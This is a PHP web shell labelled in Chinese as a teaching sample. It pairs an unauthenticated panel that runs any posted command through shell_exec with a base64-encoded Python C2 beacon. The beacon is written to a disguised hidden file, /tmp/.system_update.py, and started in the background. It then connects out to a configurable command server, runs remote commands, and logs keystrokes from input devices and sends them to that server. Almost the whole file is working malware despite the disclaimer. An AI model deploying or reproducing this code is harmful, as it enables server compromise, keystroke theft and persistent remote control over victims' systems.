<?php
/*
 * WebShell 后门演示样本 (安全教学用途, 严禁未授权使用)
 * 该样本集成: 命令执行面板 + C2 Beacon 部署
 */
header('Content-Type: text/html; charset=utf-8');

function exec_cmd($cmd) {
    $output = shell_exec($cmd . ' 2>&1');
    return $output !== null ? $output : '(no output)';
}

$c2_host = isset($_POST['c2_host']) ? $_POST['c2_host'] : (isset($_GET['c2_host']) ? $_GET['c2_host'] : '192.168.163.1');
$c2_port = isset($_POST['c2_port']) ? intval($_POST['c2_port']) : (isset($_GET['c2_port']) ? intval($_GET['c2_port']) : 4444);

$cmd_result = '';
if (isset($_POST['cmd']) && trim($_POST['cmd']) !== '') {
    $cmd_result = exec_cmd($_POST['cmd']);
}

$deploy_msg = '';
if (isset($_POST['deploy'])) {
    $deploy_msg = deploy_beacon($c2_host, $c2_port);
}

function deploy_beacon($c2_host = '192.168.163.1', $c2_port = 4444) {
    // Beacon 源码以 base64 形式内嵌, 部署时解码, 避免 heredoc 转义破坏 Python 语法
    $beacon_b64 = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwoiIiIKQzIgQmVhY29uIC0gV2ViU2hlbGwg5ZCO6Zeo5oyB5LmF5YyW6YCa5L+h5qih5Z2XCgrlip/og73vvJoKICAxLiDkuLvliqjov57mjqUgQzIg5pyN5Yqh5Zmo77yM5bu656uL5oyB5LmF6YCa5L+h6ZO+6LevCiAgMi4g5o6l5pS25bm25omn6KGM6L+c56iL5oyH5Luk77yI5Lu75oSP57O757uf5ZG95Luk77yJCiAgMy4g6ZSu55uY6K6w5b2V5Yqf6IO977yI5Y+v6L+c56iL5ZCv5YGc77yJCiAgNC4g6ZSu55uY5pWw5o2u5Yqg5a+G5Zue5Lyg6IezIEMyIOacjeWKoeWZqAoK5a6J5YWo6K2m5ZGK77ya5q2k5paH5Lu25Li65a6J5YWo5pWZ5a2m5ryU56S655So55qEIEJlYWNvbiDmoLfmnKzvvIEKICAgICAgICAg5Lil56aB55So5LqO5Lu75L2V6Z2e5o6I5p2D5Zy65pmv77yBCiIiIgoKaW1wb3J0IHNvY2tldAppbXBvcnQgc3VicHJvY2VzcwppbXBvcnQgb3MKaW1wb3J0IHRpbWUKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc3RydWN0CmltcG9ydCBnbG9iCmltcG9ydCBqc29uCmltcG9ydCBiYXNlNjQKaW1wb3J0IHN5cwppbXBvcnQgc2VsZWN0CgojID09PT09PT09PT0g6YWN572uID09PT09PT09PT0KQzJfSE9TVCA9ICd7QzJfSE9TVH0nCkMyX1BPUlQgPSB7QzJfUE9SVH0KCiMg5aaC5p6c6YCa6L+H5ZG95Luk6KGM5Y+C5pWw5oyH5a6a77yM5YiZ6KaG55uW6buY6K6k5YC8CmlmIGxlbihzeXMuYXJndikgPj0gMzoKICAgIEMyX0hPU1QgPSBzeXMuYXJndlsxXQogICAgQzJfUE9SVCA9IGludChzeXMuYXJndlsyXSkKCiMgPT09PT09PT09PSDplK7nm5jorrDlvZXlmaggPT09PT09PT09PQpFVkVOVF9GT1JNQVQgPSAnbGxISEknCkVWRU5UX1NJWkUgPSBzdHJ1Y3QuY2FsY3NpemUoRVZFTlRfRk9STUFUKQoKIyBMaW51eCDlhoXmoLjplK7noIHliLDlrZfnrKbnmoTmmKDlsIQKS0VZX01BUCA9IHsKICAgIDE6ICdbRVNDXScsIDI6ICcxJywgMzogJzInLCA0OiAnMycsIDU6ICc0JywgNjogJzUnLCA3OiAnNicsIDg6ICc3JywKICAgIDk6ICc4JywgMTA6ICc5JywgMTE6ICcwJywgMTI6ICctJywgMTM6ICc9JywgMTQ6ICdbQlNdJywgMTU6ICdbVEFCXScsCiAgICAxNjogJ3EnLCAxNzogJ3cnLCAxODogJ2UnLCAxOTogJ3InLCAyMDogJ3QnLCAyMTogJ3knLCAyMjogJ3UnLCAyMzogJ2knLAogICAgMjQ6ICdvJywgMjU6ICdwJywgMjY6ICdbJywgMjc6ICddJywgMjg6ICdbRU5UXScsIDI5OiAnW0xDVFJMXScsCiAgICAzMDogJ2EnLCAzMTogJ3MnLCAzMjogJ2QnLCAzMzogJ2YnLCAzNDogJ2cnLCAzNTogJ2gnLCAzNjogJ2onLCAzNzogJ2snLAogICAgMzg6ICdsJywgMzk6ICc7JywgNDA6ICInIiwgNDE6ICdgJywgNDI6ICdbTFNISUZUXScsIDQzOiBjaHIoOTIpLAogICAgNDQ6ICd6JywgNDU6ICd4JywgNDY6ICdjJywgNDc6ICd2JywgNDg6ICdiJywgNDk6ICduJywgNTA6ICdtJywKICAgIDUxOiAnLCcsIDUyOiAnLicsIDUzOiAnLycsIDU0OiAnW1JTSElGVF0nLCA1NjogJ1tMQUxUXScsCiAgICA1NzogJyAnLCA1ODogJ1tDQVBTXScsIDU5OiAnW0YxXScsIDYwOiAnW0YyXScsIDYxOiAnW0YzXScsCiAgICA2MjogJ1tGNF0nLCA2MzogJ1tGNV0nLCA2NDogJ1tGNl0nLCA2NTogJ1tGN10nLCA2NjogJ1tGOF0nLAogICAgNjc6ICdbRjldJywgNjg6ICdbRjEwXScsIDg3OiAnW0YxMV0nLCA4ODogJ1tGMTJdJywKICAgIDY5OiAnW05VTUxPQ0tdJywgNzA6ICdbU0NSTE9DS10nLAogICAgOTY6ICdbRU5URVJdJywgOTc6ICdbUkNUUkxdJywgMTAwOiAnW1JBTFRdJywKICAgIDEwMjogJ1tIT01FXScsIDEwMzogJ1tVUF0nLCAxMDQ6ICdbUEdVUF0nLAogICAgMTA1OiAnW0xFRlRdJywgMTA2OiAnW1JJR0hUXScsIDEwNzogJ1tFTkRdJywKICAgIDEwODogJ1tET1dOXScsIDEwOTogJ1tQR0ROXScsIDExMDogJ1tJTlNdJywgMTExOiAnW0RFTF0nLAp9CgprZXlsb2dfYnVmZmVyID0gW10Ka2V5bG9nX3J1bm5pbmcgPSBGYWxzZQprZXlsb2dfdGhyZWFkID0gTm9uZQprZXlsb2dfZGV2aWNlID0gTm9uZQpzaGlmdF9hY3RpdmUgPSBGYWxzZQpjYXBzX2FjdGl2ZSA9IEZhbHNlCgojIFNoaWZ0IOS/rumlsOWQjueahOWtl+espuaYoOWwhApTSElGVF9NQVAgPSB7CiAgICAnMSc6ICchJywgJzInOiAnQCcsICczJzogJyMnLCAnNCc6ICckJywgJzUnOiAnJScsICc2JzogJ14nLAogICAgJzcnOiAnJicsICc4JzogJyonLCAnOSc6ICcoJywgJzAnOiAnKScsICctJzogJ18nLCAnPSc6ICcrJywKICAgICdbJzogJ3snLCAnXSc6ICd9JywgY2hyKDkyKTogJ3wnLCAnOyc6ICc6JywgIiciOiAnIicsICdgJzogJ34nLAogICAgJywnOiAnPCcsICcuJzogJz4nLCAnLyc6ICc/JywKfQoKCmRlZiBmaW5kX2tleWJvYXJkX2RldmljZSgpOgogICAgIiIi5p+l5om+5omA5pyJIGFwYWNoZSDlj6/or7vnmoQgZXZlbnQg6K6+5aSH77yI55So5LqO54q25oCB5bGV56S65LiO57uf5LiA55uR5ZCs77yJIiIiCiAgICBkZXZpY2VzID0gc29ydGVkKGdsb2IuZ2xvYignL2Rldi9pbnB1dC9ldmVudConKSkKICAgIHJlYWRhYmxlID0gW10KICAgIGZvciBkZXYgaW4gZGV2aWNlczoKICAgICAgICB0cnk6CiAgICAgICAgICAgICMg55So6Z2e6Zi75aGe5pa55byP5o6i5rWL5piv5ZCm5Y+v6K+777yM6YG/5YWNIHJlYWQoKSDpmLvloZ4KICAgICAgICAgICAgZmQgPSBvcy5vcGVuKGRldiwgb3MuT19SRE9OTFkgfCBvcy5PX05PTkJMT0NLKQogICAgICAgICAgICBvcy5jbG9zZShmZCkKICAgICAgICAgICAgcmVhZGFibGUuYXBwZW5kKGRldikKICAgICAgICBleGNlcHQgKE9TRXJyb3IsIElPRXJyb3IpOgogICAgICAgICAgICBjb250aW51ZQogICAgaWYgbm90IHJlYWRhYmxlOgogICAgICAgIGtleWxvZ19idWZmZXIuYXBwZW5kKAogICAgICAgICAgICAnWyFdIOacquaJvuWIsOS7u+S9lSBhcGFjaGUg5Y+v6K+755qEIC9kZXYvaW5wdXQvZXZlbnQqIOiuvuWkhyAnCiAgICAgICAgICAgICco6ZyA5bCGIGFwYWNoZSDliqDlhaUgaW5wdXQg57uEKVxuJwogICAgICAgICkKICAgICAgICByZXR1cm4gTm9uZQogICAgcmV0dXJuIHJlYWRhYmxlCgoKZGVmIGtleWxvZ2dlcl9sb29wKCk6CiAgICAiIiLplK7nm5jorrDlvZXkuLvlvqrnjq8gLSDpnZ7pmLvloZ7nm5HlkKzlhajpg6jlj6/or7sgZXZlbnQg6K6+5aSH77yM5o2V6I635Lu75oSP6ZSu55uY5LqL5Lu2IiIiCiAgICBnbG9iYWwga2V5bG9nX2J1ZmZlciwga2V5bG9nX2RldmljZSwgc2hpZnRfYWN0aXZlLCBjYXBzX2FjdGl2ZQoKICAgIGRldmljZXMgPSBmaW5kX2tleWJvYXJkX2RldmljZSgpCiAgICBpZiBub3QgZGV2aWNlczoKICAgICAgICByZXR1cm4KCiAgICAjIOS7pemdnumYu+WhnuaWueW8j+aJk+W8gOaJgOacieiuvuWkh++8jOeUqCBzZWxlY3Qg57uf5LiA55uR5ZCsCiAgICBvcGVuX2ZkcyA9IFtdCiAgICBmb3IgZGV2IGluIGRldmljZXM6CiAgICAgICAgdHJ5OgogICAgICAgICAgICBmZCA9IG9zLm9wZW4oZGV2LCBvcy5PX1JET05MWSB8IG9zLk9fTk9OQkxPQ0spCiAgICAgICAgICAgIG9wZW5fZmRzLmFwcGVuZChmZCkKICAgICAgICBleGNlcHQgKE9TRXJyb3IsIElPRXJyb3IpOgogICAgICAgICAgICBjb250aW51ZQoKICAgIGlmIG5vdCBvcGVuX2ZkczoKICAgICAgICBrZXlsb2dfYnVmZmVyLmFwcGVuZCgnWyFdIOmUruebmOiuvuWkh+WtmOWcqOS9huaXoOazleaJk+W8gCAo5p2D6ZmQ5LiN6LazKVxuJykKICAgICAgICByZXR1cm4KCiAgICBrZXlsb2dfZGV2aWNlID0gJywnLmpvaW4oZGV2aWNlcykKICAgIGtleWxvZ19idWZmZXIuYXBwZW5kKCdbKl0g6ZSu55uY6K6w5b2V5bey5ZCv5YqoLCDnm5HlkKzorr7lpIc6IHt9XG4nLmZvcm1hdChrZXlsb2dfZGV2aWNlKSkKCiAgICB3aGlsZSBrZXlsb2dfcnVubmluZzoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHJsaXN0LCBfLCBfID0gc2VsZWN0LnNlbGVjdChvcGVuX2ZkcywgW10sIFtdLCAwLjMpCiAgICAgICAgZXhjZXB0IE9TRXJyb3I6CiAgICAgICAgICAgIHRpbWUuc2xlZXAoMC4xKQogICAgICAgICAgICBjb250aW51ZQoKICAgICAgICBmb3IgZmQgaW4gcmxpc3Q6CiAgICAgICAgICAgIHRyeToKICAgICAgICAgICAgICAgIHdoaWxlIFRydWU6CiAgICAgICAgICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgICAgICAgICBldmVudCA9IG9zLnJlYWQoZmQsIEVWRU5UX1NJWkUpCiAgICAgICAgICAgICAgICAgICAgZXhjZXB0IChCbG9ja2luZ0lPRXJyb3IsIE9TRXJyb3IpOgogICAgICAgICAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICAgICAgICAgIGlmIGxlbihldmVudCkgPCBFVkVOVF9TSVpFOgogICAgICAgICAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICAgICAgICAgIHRyeToKICAgICAgICAgICAgICAgICAgICAgICAgXywgXywgZXR5cGUsIGNvZGUsIHZhbHVlID0gc3RydWN0LnVucGFjayhFVkVOVF9GT1JNQVQsIGV2ZW50KQogICAgICAgICAgICAgICAgICAgIGV4Y2VwdCBzdHJ1Y3QuZXJyb3I6CiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICAgICAgaWYgZXR5cGUgIT0gMTogICMgRVZfS0VZIOS7peWklueahOS6i+S7tuW/veeVpQogICAgICAgICAgICAgICAgICAgICAgICBjb250aW51ZQogICAgICAgICAgICAgICAgICAgIGlmIHZhbHVlID09IDE6ICAjIOaMiemUruaMieS4iwogICAgICAgICAgICAgICAgICAgICAgICBjaGFyID0gS0VZX01BUC5nZXQoY29kZSwgJycpCiAgICAgICAgICAgICAgICAgICAgICAgICMg5aSE55CG5L+u6aWw6ZSuCiAgICAgICAgICAgICAgICAgICAgICAgIGlmIGNvZGUgPT0gNDIgb3IgY29kZSA9PSA1NDogICMg5bemL+WPsyBTaGlmdAogICAgICAgICAgICAgICAgICAgICAgICAgICAgc2hpZnRfYWN0aXZlID0gVHJ1ZQogICAgICAgICAgICAgICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgICAgICAgICAgICAgaWYgY29kZSA9PSA1ODogICMgQ2Fwc0xvY2sKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNhcHNfYWN0aXZlID0gbm90IGNhcHNfYWN0aXZlCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb250aW51ZQogICAgICAgICAgICAgICAgICAgICAgICBpZiBjaGFyOgogICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgc2hpZnRfYWN0aXZlIGFuZCBjaGFyIGluIFNISUZUX01BUDoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGFyID0gU0hJRlRfTUFQW2NoYXJdCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbGlmIHNoaWZ0X2FjdGl2ZSBvciBjYXBzX2FjdGl2ZToKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiBsZW4oY2hhcikgPT0gMSBhbmQgY2hhci5pc2FscGhhKCk6CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNoYXIgPSBjaGFyLnVwcGVyKCkKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtleWxvZ19idWZmZXIuYXBwZW5kKGNoYXIpCiAgICAgICAgICAgICAgICAgICAgZWxpZiB2YWx1ZSA9PSAwOiAgIyDmjInplK7miqzotbcKICAgICAgICAgICAgICAgICAgICAgICAgaWYgY29kZSA9PSA0MiBvciBjb2RlID09IDU0OiAgIyBTaGlmdCDph4rmlL4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNoaWZ0X2FjdGl2ZSA9IEZhbHNlCiAgICAgICAgICAgIGV4Y2VwdCAoT1NFcnJvciwgQmxvY2tpbmdJT0Vycm9yKToKICAgICAgICAgICAgICAgIGNvbnRpbnVlCgogICAgIyDpgIDlh7rml7blhbPpl63miYDmnIkgZmQKICAgIGZvciBmZCBpbiBvcGVuX2ZkczoKICAgICAgICB0cnk6CiAgICAgICAgICAgIG9zLmNsb3NlKGZkKQogICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICBwYXNzCgoKZGVmIHN0YXJ0X2tleWxvZ2dlcigpOgogICAgIiIi5ZCv5Yqo6ZSu55uY6K6w5b2VIiIiCiAgICBnbG9iYWwga2V5bG9nX3J1bm5pbmcsIGtleWxvZ190aHJlYWQKICAgIGlmIG5vdCBrZXlsb2dfcnVubmluZzoKICAgICAgICBrZXlsb2dfcnVubmluZyA9IFRydWUKICAgICAgICBrZXlsb2dfdGhyZWFkID0gdGhyZWFkaW5nLlRocmVhZCh0YXJnZXQ9a2V5bG9nZ2VyX2xvb3AsIGRhZW1vbj1UcnVlKQogICAgICAgIGtleWxvZ190aHJlYWQuc3RhcnQoKQogICAgICAgIHJldHVybiBUcnVlCiAgICByZXR1cm4gRmFsc2UKCgpkZWYgc3RvcF9rZXlsb2dnZXIoKToKICAgICIiIuWBnOatoumUruebmOiusOW9lSIiIgogICAgZ2xvYmFsIGtleWxvZ19ydW5uaW5nCiAgICBrZXlsb2dfcnVubmluZyA9IEZhbHNlCiAgICByZXR1cm4gVHJ1ZQoKCmRlZiBnZXRfa2V5bG9nX2RhdGEoKToKICAgICIiIuiOt+WPluW5tua4heepuumUruebmOiusOW9lee8k+WGsuWMuiIiIgogICAgZ2xvYmFsIGtleWxvZ19idWZmZXIKICAgIGRhdGEgPSAnJy5qb2luKGtleWxvZ19idWZmZXIpCiAgICBrZXlsb2dfYnVmZmVyID0gW10KICAgIHJldHVybiBkYXRhCgoKIyA9PT09PT09PT09IEMyIOmAmuS/oeaooeWdlyA9PT09PT09PT09CgpkZWYgcmVnaXN0ZXJfaW5mbyhzb2NrKToKICAgICIiIuWQkSBDMiDlj5HpgIHms6jlhozkv6Hmga8iIiIKICAgIHRyeToKICAgICAgICBob3N0bmFtZSA9IHN1YnByb2Nlc3MuY2hlY2tfb3V0cHV0KAogICAgICAgICAgICAnaG9zdG5hbWUnLCBzaGVsbD1UcnVlLCBzdGRlcnI9c3VicHJvY2Vzcy5ERVZOVUxMCiAgICAgICAgKS5kZWNvZGUoKS5zdHJpcCgpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGhvc3RuYW1lID0gJ3Vua25vd24nCgogICAgdHJ5OgogICAgICAgIHdob2FtaSA9IHN1YnByb2Nlc3MuY2hlY2tfb3V0cHV0KAogICAgICAgICAgICAnd2hvYW1pJywgc2hlbGw9VHJ1ZSwgc3RkZXJyPXN1YnByb2Nlc3MuREVWTlVMTAogICAgICAgICkuZGVjb2RlKCkuc3RyaXAoKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICB3aG9hbWkgPSAndW5rbm93bicKCiAgICBpbmZvID0gewogICAgICAgICd0eXBlJzogJ3JlZ2lzdGVyJywKICAgICAgICAnaG9zdG5hbWUnOiBob3N0bmFtZSwKICAgICAgICAndXNlcic6IHdob2FtaSwKICAgICAgICAnY3dkJzogb3MuZ2V0Y3dkKCksCiAgICAgICAgJ3BpZCc6IG9zLmdldHBpZCgpLAogICAgfQogICAgc29jay5zZW5kYWxsKChqc29uLmR1bXBzKGluZm8pICsgJ1xuJykuZW5jb2RlKCkpCgoKZGVmIGV4ZWN1dGVfY29tbWFuZChjbWQpOgogICAgIiIi5omn6KGM57O757uf5ZG95Luk5bm26L+U5Zue57uT5p6cIiIiCiAgICB0cnk6CiAgICAgICAgcmVzdWx0ID0gc3VicHJvY2Vzcy5ydW4oCiAgICAgICAgICAgIGNtZCwgc2hlbGw9VHJ1ZSwgY2FwdHVyZV9vdXRwdXQ9VHJ1ZSwgdGltZW91dD0zMAogICAgICAgICkKICAgICAgICBvdXRwdXQgPSByZXN1bHQuc3Rkb3V0LmRlY29kZShlcnJvcnM9J3JlcGxhY2UnKQogICAgICAgIGVycm9ycyA9IHJlc3VsdC5zdGRlcnIuZGVjb2RlKGVycm9ycz0ncmVwbGFjZScpCiAgICAgICAgaWYgZXJyb3JzOgogICAgICAgICAgICBvdXRwdXQgKz0gJ1xuW1NUREVSUl1cbicgKyBlcnJvcnMKICAgICAgICBpZiBub3Qgb3V0cHV0LnN0cmlwKCk6CiAgICAgICAgICAgIG91dHB1dCA9ICcobm8gb3V0cHV0KScKICAgICAgICByZXR1cm4gb3V0cHV0CiAgICBleGNlcHQgc3VicHJvY2Vzcy5UaW1lb3V0RXhwaXJlZDoKICAgICAgICByZXR1cm4gJ1shXSBDb21tYW5kIHRpbWVkIG91dCAoMzBzKScKICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICByZXR1cm4gJ1shXSBFcnJvcjoge30nLmZvcm1hdChlKQoKCmRlZiBiZWFjb25fbG9vcCgpOgogICAgIiIiQmVhY29uIOS4u+W+queOryAtIOe7tOaMgeS4jiBDMiDnmoTmjIHkuYXpgJrkv6EiIiIKICAgIHByaW50KCJbKl0gQzIgQmVhY29uIOWQr+WKqCIpCiAgICBwcmludCgiWypdIOebruaghzoge306e30iLmZvcm1hdChDMl9IT1NULCBDMl9QT1JUKSkKCiAgICB3aGlsZSBUcnVlOgogICAgICAgIHRyeToKICAgICAgICAgICAgc29jayA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKICAgICAgICAgICAgc29jay5zZXR0aW1lb3V0KDE1KQogICAgICAgICAgICBzb2NrLmNvbm5lY3QoKEMyX0hPU1QsIEMyX1BPUlQpKQogICAgICAgICAgICBwcmludCgiWytdIOW3sui/nuaOpeWIsCBDMiDmnI3liqHlmagiKQoKICAgICAgICAgICAgIyDlj5HpgIHms6jlhozkv6Hmga8KICAgICAgICAgICAgcmVnaXN0ZXJfaW5mbyhzb2NrKQogICAgICAgICAgICBwcmludCgiWytdIOazqOWGjOS/oeaBr+W3suWPkemAgSIpCgogICAgICAgICAgICAjIOaMgeS5hemAmuS/oeW+queOrwogICAgICAgICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgICAgIGRhdGEgPSBzb2NrLnJlY3YoNDA5NikKICAgICAgICAgICAgICAgICAgICBpZiBub3QgZGF0YToKICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQoIlstXSBDMiDov57mjqXmlq3lvIAiKQogICAgICAgICAgICAgICAgICAgICAgICBicmVhawoKICAgICAgICAgICAgICAgICAgICBjb21tYW5kID0gZGF0YS5kZWNvZGUoZXJyb3JzPSdyZXBsYWNlJykuc3RyaXAoKQogICAgICAgICAgICAgICAgICAgIGlmIG5vdCBjb21tYW5kOgogICAgICAgICAgICAgICAgICAgICAgICBjb250aW51ZQoKICAgICAgICAgICAgICAgICAgICBwcmludCgiWypdIOaUtuWIsOaMh+S7pDoge30iLmZvcm1hdChjb21tYW5kKSkKCiAgICAgICAgICAgICAgICAgICAgaWYgY29tbWFuZCA9PSAncGluZyc6CiAgICAgICAgICAgICAgICAgICAgICAgIHNvY2suc2VuZGFsbChiJ3BvbmdcbicpCgogICAgICAgICAgICAgICAgICAgIGVsaWYgY29tbWFuZCA9PSAnZXhpdCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHN0b3Bfa2V5bG9nZ2VyKCkKICAgICAgICAgICAgICAgICAgICAgICAgc29jay5zZW5kYWxsKGInYnllXG4nKQogICAgICAgICAgICAgICAgICAgICAgICBzb2NrLmNsb3NlKCkKICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQoIlsqXSDmlLbliLDpgIDlh7rmjIfku6TvvIxCZWFjb24g5YWz6ZetIikKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuCgogICAgICAgICAgICAgICAgICAgIGVsaWYgY29tbWFuZCA9PSAna2V5bG9nX29uJzoKICAgICAgICAgICAgICAgICAgICAgICAgb2sgPSBzdGFydF9rZXlsb2dnZXIoKQogICAgICAgICAgICAgICAgICAgICAgICBtc2cgPSAnS0VZTE9HIHN0YXJ0ZWQnIGlmIG9rIGVsc2UgJ0tFWUxPRyBhbHJlYWR5IHJ1bm5pbmcnCiAgICAgICAgICAgICAgICAgICAgICAgIHNvY2suc2VuZGFsbCgobXNnICsgJ1xuJykuZW5jb2RlKCkpCiAgICAgICAgICAgICAgICAgICAgICAgIHByaW50KCJbKl0g6ZSu55uY6K6w5b2V5bey5ZCv5YqoIikKCiAgICAgICAgICAgICAgICAgICAgZWxpZiBjb21tYW5kID09ICdrZXlsb2dfb2ZmJzoKICAgICAgICAgICAgICAgICAgICAgICAgc3RvcF9rZXlsb2dnZXIoKQogICAgICAgICAgICAgICAgICAgICAgICBzb2NrLnNlbmRhbGwoYidLRVlMT0cgc3RvcHBlZFxuJykKICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQoIlsqXSDplK7nm5jorrDlvZXlt7LlgZzmraIiKQoKICAgICAgICAgICAgICAgICAgICBlbGlmIGNvbW1hbmQgPT0gJ2tleWxvZ19kdW1wJzoKICAgICAgICAgICAgICAgICAgICAgICAgbG9nX2RhdGEgPSBnZXRfa2V5bG9nX2RhdGEoKQogICAgICAgICAgICAgICAgICAgICAgICAjIEJhc2U2NCDnvJbnoIHlkI7lm57kvKAKICAgICAgICAgICAgICAgICAgICAgICAgZW5jb2RlZCA9IGJhc2U2NC5iNjRlbmNvZGUoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb2dfZGF0YS5lbmNvZGUoZXJyb3JzPSdyZXBsYWNlJykKICAgICAgICAgICAgICAgICAgICAgICAgKS5kZWNvZGUoKQogICAgICAgICAgICAgICAgICAgICAgICBzb2NrLnNlbmRhbGwoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAoJ0tFWUxPR19EQVRBICcgKyBlbmNvZGVkICsgJ1xuJykuZW5jb2RlKCkKICAgICAgICAgICAgICAgICAgICAgICAgKQogICAgICAgICAgICAgICAgICAgICAgICBwcmludCgiWypdIOmUruebmOaVsOaNruW3suWbnuS8oCAoe30gYnl0ZXMpIi5mb3JtYXQobGVuKGxvZ19kYXRhKSkpCgogICAgICAgICAgICAgICAgICAgIGVsaWYgY29tbWFuZC5zdGFydHN3aXRoKCdleGVjICcpOgogICAgICAgICAgICAgICAgICAgICAgICBjbWQgPSBjb21tYW5kWzU6XQogICAgICAgICAgICAgICAgICAgICAgICByZXN1bHQgPSBleGVjdXRlX2NvbW1hbmQoY21kKQogICAgICAgICAgICAgICAgICAgICAgICBzb2NrLnNlbmRhbGwoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAoJ0NNRF9SRVNVTFRcbicgKyByZXN1bHQgKyAnXG5fX0VORF9fXG4nKS5lbmNvZGUoKQogICAgICAgICAgICAgICAgICAgICAgICApCiAgICAgICAgICAgICAgICAgICAgICAgIHByaW50KCJbKl0g5ZG95Luk5omn6KGM5a6M5oiQOiB7fSIuZm9ybWF0KGNtZCkpCgogICAgICAgICAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICAgICAgICAgIHNvY2suc2VuZGFsbChiJ1VOS05PV05fQ09NTUFORFxuJykKCiAgICAgICAgICAgICAgICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6CiAgICAgICAgICAgICAgICAgICAgIyDlj5HpgIHlv4Pot7MKICAgICAgICAgICAgICAgICAgICB0cnk6CiAgICAgICAgICAgICAgICAgICAgICAgIHNvY2suc2VuZGFsbChiJ0hFQVJUQkVBVFxuJykKICAgICAgICAgICAgICAgICAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgICAgICAgICAgICAgICAgICBwcmludCgiWy1dIOW/g+i3s+WPkemAgeWksei0pe+8jOi/nuaOpeaWreW8gCIpCiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICAgICAgY29udGludWUKCiAgICAgICAgICAgIHNvY2suY2xvc2UoKQoKICAgICAgICBleGNlcHQgQ29ubmVjdGlvblJlZnVzZWRFcnJvcjoKICAgICAgICAgICAgcHJpbnQoIlstXSBDMiDmnI3liqHlmajmnKrlsLHnu6rvvIw1IOenkuWQjumHjeivlS4uLiIpCiAgICAgICAgZXhjZXB0IHNvY2tldC50aW1lb3V0OgogICAgICAgICAgICBwcmludCgiWy1dIOi/nuaOpei2heaXtu+8jDUg56eS5ZCO6YeN6K+VLi4uIikKICAgICAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgICAgIHByaW50KCJbLV0g6ZSZ6K+vOiB7fe+8jDUg56eS5ZCO6YeN6K+VLi4uIi5mb3JtYXQoZSkpCgogICAgICAgIHRpbWUuc2xlZXAoNSkKCgppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOgogICAgYmVhY29uX2xvb3AoKQo=';

    $beacon_code = base64_decode($beacon_b64);
    $beacon_code = str_replace('{C2_HOST}', $c2_host, $beacon_code);
    $beacon_code = str_replace('{C2_PORT}', $c2_port, $beacon_code);

    $path = '/tmp/.system_update.py';

    // 写入 Beacon 文件（带错误检查）
    $written = @file_put_contents($path, $beacon_code);
    if ($written === false) {
        return "[!] 部署失败: 无法写入 {$path} (检查 /tmp 目录权限或磁盘空间)";
    }
    if (!@chmod($path, 0755)) {
        return "[!] 部署警告: 无法设置 {$path} 可执行权限 (chmod 0755 失败)";
    }

    // 后台拉起 Beacon
    $pid = trim(shell_exec("nohup python3 " . escapeshellarg($path) . " > /dev/null 2>&1 & echo $!"));
    if ($pid === '') {
        return "[!] 部署失败: 无法启动 python3 (确认 python3 在 apache 用户的 PATH 中, 或改用绝对路径)";
    }

    // 等待 1 秒后确认进程是否还在（若 python 启动即崩, 进程会消失）
    sleep(1);
    $check = shell_exec("ps -p " . escapeshellarg($pid) . " -o pid= 2>/dev/null");
    if (trim($check) === '') {
        // 进程已退出, 读取 python 报错
        $err = shell_exec("python3 " . escapeshellarg($path) . " 2>&1 | head -5");
        return "[!] 部署失败: Beacon 进程 (PID: {$pid}) 启动后立即退出。Python 报错:\n" . $err;
    }

    return "Beacon 已部署 (PID: " . $pid . ")  连接目标: " . $c2_host . ":" . $c2_port;
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<title>演示用 WebShell 控制台</title>
<style>
  body { background:#1e1e1e; color:#d4d4d4; font-family:Consolas,Menlo,monospace; margin:0; padding:20px; }
  h1 { color:#4ec9b0; font-size:18px; }
  .panel { background:#252526; border:1px solid #3c3c3c; border-radius:6px; padding:16px; margin-bottom:16px; }
  .panel h2 { color:#9cdcfe; font-size:14px; margin-top:0; }
  textarea, input[type=text] { background:#1e1e1e; color:#d4d4d4; border:1px solid #3c3c3c; border-radius:4px; padding:8px; font-family:inherit; width:100%; box-sizing:border-box; }
  input[type=text] { width:200px; }
  button { background:#0e639c; color:#fff; border:none; border-radius:4px; padding:8px 16px; cursor:pointer; font-family:inherit; }
  button:hover { background:#1177bb; }
  .row { margin-bottom:10px; }
  label { display:inline-block; width:90px; color:#9cdcfe; }
